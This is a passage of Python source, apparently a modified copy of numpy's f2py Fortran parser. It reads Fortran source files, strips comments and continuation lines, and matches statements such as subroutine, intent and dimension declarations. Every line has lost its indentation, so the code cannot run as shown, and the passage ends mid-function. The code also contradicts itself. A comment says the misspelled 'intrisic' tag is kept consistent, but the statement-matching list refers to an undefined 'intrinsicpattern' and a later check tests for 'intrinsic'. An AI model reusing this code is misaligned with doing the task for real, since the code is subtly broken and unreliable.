verbose = 1 # Be quiet if 0, extra verbose if > 1.
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0 # for old F77 programs without 'program' statement
ignorecontains = 1
dolowercase = 1
debug = []
# Global variables
beginpattern = ''
currentfilename = ''
expectbegin = 1
f90modulevars = {}
filepositiontext = ''
gotnextfile = 1
groupcache = None
groupcounter = 0
grouplist = {groupcounter: []}
groupname = ''
include_paths = []
neededmodule = -1
onlyfuncs = []
previous_context = None
skipblocksuntil = -1
skipfuncs = []
skipfunctions = []
usermodules = []
def reset_global_f2py_vars():
global groupcounter, grouplist, neededmodule, expectbegin
global skipblocksuntil, usermodules, f90modulevars, gotnextfile
global filepositiontext, currentfilename, skipfunctions, skipfuncs
global onlyfuncs, include_paths, previous_context
global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename
global f77modulename, skipemptyends, ignorecontains, dolowercase, debug
# flags
strictf77 = 1
sourcecodeform = 'fix'
quiet = 0
verbose = 1
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0
ignorecontains = 1
dolowercase = 1
debug = []
# variables
groupcounter = 0
grouplist = {groupcounter: []}
neededmodule = -1
expectbegin = 1
skipblocksuntil = -1
usermodules = []
f90modulevars = {}
gotnextfile = 1
filepositiontext = ''
currentfilename = ''
skipfunctions = []
skipfuncs = []
onlyfuncs = []
include_paths = []
previous_context = None
def outmess(line, flag=1):
global filepositiontext
if not verbose:
return
if not quiet:
if flag:
sys.stdout.write(filepositiontext)
sys.stdout.write(line)
re._MAXCACHE = 50
defaultimplicitrules = {}
for c in "abcdefghopqrstuvwxyz$_":
defaultimplicitrules[c] = {'typespec': 'real'}
for c in "ijklmn":
defaultimplicitrules[c] = {'typespec': 'integer'}
del c
badnames = {}
invbadnames = {}
for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case', 'while',
'return', 'signed', 'unsigned', 'if', 'for', 'typedef', 'sizeof', 'union',
'struct', 'static', 'register', 'new', 'break', 'do', 'goto', 'switch',
'continue', 'else', 'inline', 'extern', 'delete', 'const', 'auto',
'len', 'rank', 'shape', 'index', 'slen', 'size', '_i',
'max', 'min',
'flen', 'fshape',
'string', 'complex_double', 'float_double', 'stdin', 'stderr', 'stdout',
'type', 'default']:
badnames[n] = n + '_bn'
invbadnames[n + '_bn'] = n
def rmbadname1(name):
if name in badnames:
errmess('rmbadname1: Replacing "%s" with "%s".\n' %
(name, badnames[name]))
return badnames[name]
return name
def rmbadname(names):
return [rmbadname1(_m) for _m in names]
def undo_rmbadname1(name):
if name in invbadnames:
errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'
% (name, invbadnames[name]))
return invbadnames[name]
return name
def undo_rmbadname(names):
return [undo_rmbadname1(_m) for _m in names]
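# Illustrative round trip: C reserved words gain a '_bn' suffix and lose it
# again, e.g. rmbadname(['int', 'x']) -> ['int_bn', 'x'] and
# undo_rmbadname(['int_bn']) -> ['int'].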
def getextension(name):
i = name.rfind('.')
if i == -1:
return ''
if '\\' in name[i:]:
return ''
if '/' in name[i:]:
return ''
return name[i + 1:]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
f = open(file, 'r')
line = f.readline()
n = 15 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n > 0 and line:
if line[0] != '!' and line.strip():
n -= 1
if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&':
result = 1
break
line = f.readline()
f.close()
return result
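# Illustrative: a source whose early statements start in column 1 (rather
# than after the fixed-form six-column field) or end in '&' continuations is
# reported as free format; classic column-7 fixed-form code is not.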
# Read fortran (77,90) code
def readfortrancode(ffile, dowithline=show, istop=1):
"""
Read fortran codes from files and
1) Get rid of comments, line continuations, and empty lines; lower cases.
2) Call dowithline(line) on every line.
3) Recursively call itself when statement \"include '<filename>'\" is met.
"""
global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77
global beginpattern, quiet, verbose, dolowercase, include_paths
if not istop:
saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase
if ffile == []:
return
localdolowercase = dolowercase
cont = 0
finalline = ''
ll = ''
commentline = re.compile(
r'(?P<line>([^"]*["][^"]*["][^"!]*|[^\']*\'[^\']*\'[^\'!]*|[^!\'"]*))!{1}(?P<rest>.*)')
includeline = re.compile(
r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I)
cont1 = re.compile(r'(?P<line>.*)&\s*\Z')
cont2 = re.compile(r'(\s*&|)(?P<line>.*)')
mline_mark = re.compile(r".*?'''")
if istop:
dowithline('', -1)
ll, l1 = '', ''
spacedigits = [' '] + [str(_m) for _m in range(10)]
filepositiontext = ''
fin = fileinput.FileInput(ffile)
while True:
l = fin.readline()
if not l:
break
if fin.isfirstline():
filepositiontext = ''
currentfilename = fin.filename()
gotnextfile = 1
l1 = l
strictf77 = 0
sourcecodeform = 'fix'
ext = os.path.splitext(currentfilename)[1]
if is_f_file(currentfilename) and \
not (_has_f90_header(l) or _has_fix_header(l)):
strictf77 = 1
elif is_free_format(currentfilename) and not _has_fix_header(l):
sourcecodeform = 'free'
if strictf77:
beginpattern = beginpattern77
else:
beginpattern = beginpattern90
outmess('\tReading file %s (format:%s%s)\n'
% (repr(currentfilename), sourcecodeform,
strictf77 and ',strict' or ''))
l = l.expandtabs().replace('\xa0', ' ')
# Get rid of newline characters
while not l == '':
if l[-1] not in "\n\r\f":
break
l = l[:-1]
if not strictf77:
r = commentline.match(l)
if r:
l = r.group('line') + ' ' # Strip comments starting with `!'
rl = r.group('rest')
if rl[:4].lower() == 'f2py': # f2py directive
l = l + 4 * ' '
r = commentline.match(rl[4:])
if r:
l = l + r.group('line')
else:
l = l + rl[4:]
if l.strip() == '': # Skip empty line
cont = 0
continue
if sourcecodeform == 'fix':
if l[0] in ['*', 'c', '!', 'C', '#']:
if l[1:5].lower() == 'f2py': # f2py directive
l = ' ' + l[5:]
else: # Skip comment line
cont = 0
continue
elif strictf77:
if len(l) > 72:
l = l[:72]
if not (l[0] in spacedigits):
raise Exception('readfortrancode: Found non-(space,digit) char '
'in the first column.\n\tAre you sure that '
'this code is in fix form?\n\tline=%s' % repr(l))
if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '):
# Continuation of a previous line
ll = ll + l[6:]
finalline = ''
origfinalline = ''
else:
if not strictf77:
# F90 continuation
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
elif sourcecodeform == 'free':
if not cont and ext == '.pyf' and mline_mark.match(l):
l = l + '\n'
while True:
lc = fin.readline()
if not lc:
errmess(
'Unexpected end of file when reading multiline\n')
break
l = l + lc
if mline_mark.match(lc):
break
l = l.rstrip()
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
raise ValueError(
"Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform))
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [
os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
l1 = ll
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
filepositiontext = ''
fin.close()
if istop:
dowithline('', 1)
else:
gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase = saveglobals
# Crack line
beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \
r'\s*(?P<this>(\b(%s)\b))' + \
r'\s*(?P<after>%s)\s*\Z'
##
fortrantypes = 'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte'
typespattern = re.compile(
beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type'
typespattern4implicit = re.compile(beforethisafter % (
'', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I)
#
functionpattern = re.compile(beforethisafter % (
'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin'
subroutinepattern = re.compile(beforethisafter % (
'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin'
# modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin'
#
groupbegins77 = r'program|block\s*data'
beginpattern77 = re.compile(
beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin'
groupbegins90 = groupbegins77 + \
r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()'
beginpattern90 = re.compile(
beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin'
groupends = r'end|endprogram|endblockdata|endmodule|endpythonmodule|endinterface'
endpattern = re.compile(
beforethisafter % ('', groupends, groupends, '[\w\s]*'), re.I), 'end'
# endifs='end\s*(if|do|where|select|while|forall)'
endifs = '(end\s*(if|do|where|select|while|forall))|(module\s*procedure)'
endifpattern = re.compile(
beforethisafter % ('[\w]*?', endifs, endifs, '[\w\s]*'), re.I), 'endif'
#
implicitpattern = re.compile(
beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit'
dimensionpattern = re.compile(beforethisafter % (
'', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension'
externalpattern = re.compile(
beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external'
optionalpattern = re.compile(
beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional'
requiredpattern = re.compile(
beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required'
publicpattern = re.compile(
beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public'
privatepattern = re.compile(
beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private'
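# NOTE: 'intrisic' is a historical misspelling of 'intrinsic'; the same
# (misspelled) tag string is what gets passed on to analyzeline() as the
# statement kind, so it is kept consistent here.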
intrisicpattern = re.compile(
beforethisafter % ('', 'intrisic', 'intrisic', '.*'), re.I), 'intrisic'
intentpattern = re.compile(beforethisafter % (
'', 'intent|depend|note|check', 'intent|depend|note|check', '\s*\(.*?\).*'), re.I), 'intent'
parameterpattern = re.compile(
beforethisafter % ('', 'parameter', 'parameter', '\s*\(.*'), re.I), 'parameter'
datapattern = re.compile(
beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data'
callpattern = re.compile(
beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call'
entrypattern = re.compile(
beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry'
callfunpattern = re.compile(
beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun'
commonpattern = re.compile(
beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common'
usepattern = re.compile(
beforethisafter % ('', 'use', 'use', '.*'), re.I), 'use'
containspattern = re.compile(
beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains'
formatpattern = re.compile(
beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format'
# Non-fortran and f2py-specific statements
f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef',
'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements'
multilinepattern = re.compile(
r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline'
##
def _simplifyargs(argsline):
a = []
for n in markoutercomma(argsline).split('@,@'):
for r in '(),':
n = n.replace(r, '_')
a.append(n)
return ','.join(a)
crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I)
def crackline(line, reset=0):
"""
reset=-1 --- initialize
reset=0 --- crack the line
reset=1 --- final check if mismatch of blocks occurred
Cracked data is saved in grouplist[0].
"""
global beginpattern, groupcounter, groupname, groupcache, grouplist
global filepositiontext, currentfilename, neededmodule, expectbegin
global skipblocksuntil, skipemptyends, previous_context, gotnextfile
if ';' in line and not (f2pyenhancementspattern[0].match(line) or
multilinepattern[0].match(line)):
for l in line.split(';'):
# XXX: non-zero reset values need testing
assert reset == 0, repr(reset)
crackline(l, reset)
return
if reset < 0:
groupcounter = 0
groupname = {groupcounter: ''}
groupcache = {groupcounter: {}}
grouplist = {groupcounter: []}
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = ''
groupcache[groupcounter]['name'] = ''
neededmodule = -1
skipblocksuntil = -1
return
if reset > 0:
fl = 0
if f77modulename and neededmodule == groupcounter:
fl = 2
while groupcounter > fl:
outmess('crackline: groupcounter=%s groupname=%s\n' %
(repr(groupcounter), repr(groupname)))
outmess(
'crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n')
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if f77modulename and neededmodule == groupcounter:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end module
neededmodule = -1
return
if line == '':
return
flag = 0
for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern,
requiredpattern,
parameterpattern, datapattern, publicpattern, privatepattern,
                intrinsicpattern,
endifpattern, endpattern,
formatpattern,
beginpattern, functionpattern, subroutinepattern,
implicitpattern, typespattern, commonpattern,
callpattern, usepattern, containspattern,
entrypattern,
f2pyenhancementspattern,
multilinepattern
]:
m = pat[0].match(line)
if m:
break
flag = flag + 1
if not m:
re_1 = crackline_re_1
if 0 <= skipblocksuntil <= groupcounter:
return
if 'externals' in groupcache[groupcounter]:
for name in groupcache[groupcounter]['externals']:
if name in invbadnames:
name = invbadnames[name]
if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']:
continue
m1 = re.match(
r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I)
if m1:
m2 = re_1.match(m1.group('before'))
a = _simplifyargs(m1.group('args'))
if m2:
line = 'callfun %s(%s) result (%s)' % (
name, a, m2.group('result'))
else:
line = 'callfun %s(%s)' % (name, a)
m = callfunpattern[0].match(line)
if not m:
outmess(
'crackline: could not resolve function call for line=%s.\n' % repr(line))
return
analyzeline(m, 'callfun', line)
return
if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')):
previous_context = None
outmess('crackline:%d: No pattern for line\n' % (groupcounter))
return
elif pat[1] == 'end':
if 0 <= skipblocksuntil < groupcounter:
groupcounter = groupcounter - 1
if skipblocksuntil <= groupcounter:
return
if groupcounter <= 0:
raise Exception('crackline: groupcounter(=%s) is nonpositive. '
'Check the blocks.'
% (groupcounter))
        m1 = beginpattern[0].match(line)
        if m1 and m1.group('this') != groupname[groupcounter]:
raise Exception('crackline: End group %s does not match with '
'previous Begin group %s\n\t%s' %
(repr(m1.group('this')), repr(groupname[groupcounter]),
filepositiontext)
)
if skipblocksuntil == groupcounter:
skipblocksuntil = -1
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if not skipemptyends:
expectbegin = 1
elif pat[1] == 'begin':
if 0 <= skipblocksuntil <= groupcounter:
groupcounter = groupcounter + 1
return
gotnextfile = 0
analyzeline(m, pat[1], line)
expectbegin = 0
elif pat[1] == 'endif':
pass
elif pat[1] == 'contains':
if ignorecontains:
return
if 0 <= skipblocksuntil <= groupcounter:
return
skipblocksuntil = groupcounter
else:
if 0 <= skipblocksuntil <= groupcounter:
return
analyzeline(m, pat[1], line)
def markouterparen(line):
l = ''
f = 0
for c in line:
if c == '(':
f = f + 1
if f == 1:
l = l + '@(@'
continue
elif c == ')':
f = f - 1
if f == 0:
l = l + '@)@'
continue
l = l + c
return l
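# Illustrative example: only parentheses at nesting depth one are marked,
# nested pairs are left as-is:
#   markouterparen('a(b(c),d)')  ->  'a@(@b(c),d@)@'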
def markoutercomma(line, comma=','):
l = ''
f = 0
cc = ''
for c in line:
if (not cc or cc == ')') and c == '(':
f = f + 1
cc = ')'
elif not cc and c == '\'' and (not l or l[-1] != '\\'):
f = f + 1
cc = '\''
elif c == cc:
f = f - 1
if f == 0:
cc = ''
elif c == comma and f == 0:
l = l + '@' + comma + '@'
continue
l = l + c
assert not f, repr((f, line, l, cc))
return l
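# Illustrative examples: commas nested in parentheses or quoted strings are
# protected, only outer-level ones are marked:
#   markoutercomma('a,b(1,2),c')  ->  'a@,@b(1,2)@,@c'
#   markoutercomma("'x,y',z")     ->  "'x,y'@,@z"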
def unmarkouterparen(line):
r = line.replace('@(@', '(').replace('@)@', ')')
return r
def appenddecl(decl, decl2, force=1):
if not decl:
decl = {}
if not decl2:
return decl
if decl is decl2:
return decl
for k in list(decl2.keys()):
if k == 'typespec':
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'attrspec':
for l in decl2[k]:
decl = setattrspec(decl, l, force)
elif k == 'kindselector':
decl = setkindselector(decl, decl2[k], force)
elif k == 'charselector':
decl = setcharselector(decl, decl2[k], force)
elif k in ['=', 'typename']:
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'note':
pass
elif k in ['intent', 'check', 'dimension', 'optional', 'required']:
errmess('appenddecl: "%s" not implemented.\n' % k)
else:
raise Exception('appenddecl: Unknown variable definition key:' +
str(k))
return decl
selectpattern = re.compile(
r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I)
nameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I)
callnameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I)
real16pattern = re.compile(
r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)')
real8pattern = re.compile(
r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))')
_intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I)
def _is_intent_callback(vdecl):
for a in vdecl.get('attrspec', []):
if _intentcallbackpattern.match(a):
return 1
return 0
def _resolvenameargspattern(line):
line = markouterparen(line)
m1 = nameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind')
m1 = callnameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), None, None
return None, [], None, None
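# Illustrative example: the helper applies markouterparen itself, so a plain
# signature-like string can be passed directly:
#   _resolvenameargspattern('myfunc(a, b) result (c)')
#   ->  ('myfunc', 'a, b', 'c', None)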
def analyzeline(m, case, line):
global groupcounter, groupname, groupcache, grouplist, filepositiontext
global currentfilename, f77modulename, neededinterface, neededmodule
global expectbegin, gotnextfile, previous_context
block = m.group('this')
if case != 'multiline':
previous_context = None
if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \
and not skipemptyends and groupcounter < 1:
newname = os.path.basename(currentfilename).split('.')[0]
outmess(
'analyzeline: no group yet. Creating program group with name "%s".\n' % newname)
gotnextfile = 0
groupcounter = groupcounter + 1
groupname[groupcounter] = 'program'
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = 'program'
groupcache[groupcounter]['name'] = newname
groupcache[groupcounter]['from'] = 'fromsky'
expectbegin = 0
if case in ['begin', 'call', 'callfun']:
# Crack line => block,name,args,result
block = block.lower()
if re.match(r'block\s*data', block, re.I):
block = 'block data'
if re.match(r'python\s*module', block, re.I):
block = 'python module'
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is None:
if block == 'block data':
name = '_BLOCK_DATA_'
else:
name = ''
if block not in ['interface', 'block data']:
outmess('analyzeline: No name/args pattern found for line.\n')
previous_context = (block, name, groupcounter)
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
if '' in args:
while '' in args:
args.remove('')
outmess(
'analyzeline: argument list is malformed (missing argument).\n')
# end of crack line => block,name,args,result
needmodule = 0
needinterface = 0
if case in ['call', 'callfun']:
needinterface = 1
if 'args' not in groupcache[groupcounter]:
return
if name not in groupcache[groupcounter]['args']:
return
for it in grouplist[groupcounter]:
if it['name'] == name:
return
if name in groupcache[groupcounter]['interfaced']:
return
block = {'call': 'subroutine', 'callfun': 'function'}[case]
if f77modulename and neededmodule == -1 and groupcounter <= 1:
neededmodule = groupcounter + 2
needmodule = 1
if block != 'interface':
needinterface = 1
# Create new block(s)
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needmodule:
if verbose > 1:
outmess('analyzeline: Creating module block %s\n' %
repr(f77modulename), 0)
groupname[groupcounter] = 'module'
groupcache[groupcounter]['block'] = 'python module'
groupcache[groupcounter]['name'] = f77modulename
groupcache[groupcounter]['from'] = ''
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needinterface:
if verbose > 1:
outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (
groupcounter), 0)
groupname[groupcounter] = 'interface'
groupcache[groupcounter]['block'] = 'interface'
groupcache[groupcounter]['name'] = 'unknown_interface'
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupname[groupcounter] = block
groupcache[groupcounter]['block'] = block
if not name:
name = 'unknown_' + block
groupcache[groupcounter]['prefix'] = m.group('before')
groupcache[groupcounter]['name'] = rmbadname1(name)
groupcache[groupcounter]['result'] = result
if groupcounter == 1:
groupcache[groupcounter]['from'] = currentfilename
else:
if f77modulename and groupcounter == 3:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], currentfilename)
else:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
for k in list(groupcache[groupcounter].keys()):
if not groupcache[groupcounter][k]:
del groupcache[groupcounter][k]
groupcache[groupcounter]['args'] = args
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['entry'] = {}
# end of creation
if block == 'type':
groupcache[groupcounter]['varnames'] = []
if case in ['call', 'callfun']: # set parents variables
if name not in groupcache[groupcounter - 2]['externals']:
groupcache[groupcounter - 2]['externals'].append(name)
groupcache[groupcounter]['vars'] = copy.deepcopy(
groupcache[groupcounter - 2]['vars'])
            try:
                # drop the 'external' attribute inherited from the parent scope
                attrspec = groupcache[groupcounter]['vars'][name]['attrspec']
                del attrspec[attrspec.index('external')]
            except (KeyError, ValueError):
                pass
if block in ['function', 'subroutine']: # set global attributes
try:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars'][''])
            except Exception:
pass
if case == 'callfun': # return type
if result and result in groupcache[groupcounter]['vars']:
if not name == result:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter]['vars'][result])
# if groupcounter>1: # name is interfaced
try:
groupcache[groupcounter - 2]['interfaced'].append(name)
            except KeyError:
pass
if block == 'function':
t = typespattern[0].match(m.group('before') + ' ' + name)
if t:
typespec, selector, attr, edecl = cracktypespec0(
t.group('this'), t.group('after'))
updatevars(typespec, selector, attr, edecl)
if case in ['call', 'callfun']:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end routine
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
elif case == 'entry':
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is not None:
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
assert result is None, repr(result)
groupcache[groupcounter]['entry'][name] = args
previous_context = ('entry', name, groupcounter)
elif case == 'type':
typespec, selector, attr, edecl = cracktypespec0(
block, m.group('after'))
last_name = updatevars(typespec, selector, attr, edecl)
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
    elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrinsic']:
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()
i = ll.find('::')
if i < 0 and case == 'intent':
i = markouterparen(ll).find('@)@') - 2
ll = ll[:i + 1] + '::' + ll[i + 1:]
i = ll.find('::')
if ll[i:] == '::' and 'args' in groupcache[groupcounter]:
outmess('All arguments will have attribute %s%s\n' %
(m.group('this'), ll[:i]))
ll = ll + ','.join(groupcache[groupcounter]['args'])
if i < 0:
i = 0
pl = ''
else:
pl = ll[:i].strip()
ll = ll[i + 2:]
ch = markoutercomma(pl).split('@,@')
if len(ch) > 1:
pl = ch[0]
outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (
','.join(ch[1:])))
last_name = None
for e in [x.strip() for x in markoutercomma(ll).split('@,@')]:
m1 = namepattern.match(e)
if not m1:
if case in ['public', 'private']:
k = ''
else:
print(m.groupdict())
outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % (
case, repr(e)))
continue
else:
k = rmbadname1(m1.group('name'))
if k not in edecl:
edecl[k] = {}
if case == 'dimension':
ap = case + m1.group('after')
if case == 'intent':
ap = m.group('this') + pl
if _intentcallbackpattern.match(ap):
if k not in groupcache[groupcounter]['args']:
if groupcounter > 1:
if '__user__' not in groupcache[groupcounter - 2]['name']:
outmess(
                                    'analyzeline: missing __user__ module (this may be harmless)\n')
# fixes ticket 1693
if k != groupcache[groupcounter]['name']:
outmess('analyzeline: appending intent(callback) %s'
' to %s arguments\n' % (k, groupcache[groupcounter]['name']))
groupcache[groupcounter]['args'].append(k)
else:
errmess(
                                'analyzeline: intent(callback) %s is ignored\n' % (k))
else:
errmess('analyzeline: intent(callback) %s is already'
                                ' in argument list\n' % (k))
            if case in ['optional', 'required', 'public', 'external', 'private', 'intrinsic']:
ap = case
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append(ap)
else:
edecl[k]['attrspec'] = [ap]
if case == 'external':
if groupcache[groupcounter]['block'] == 'program':
outmess('analyzeline: ignoring program arguments\n')
continue
if k not in groupcache[groupcounter]['args']:
continue
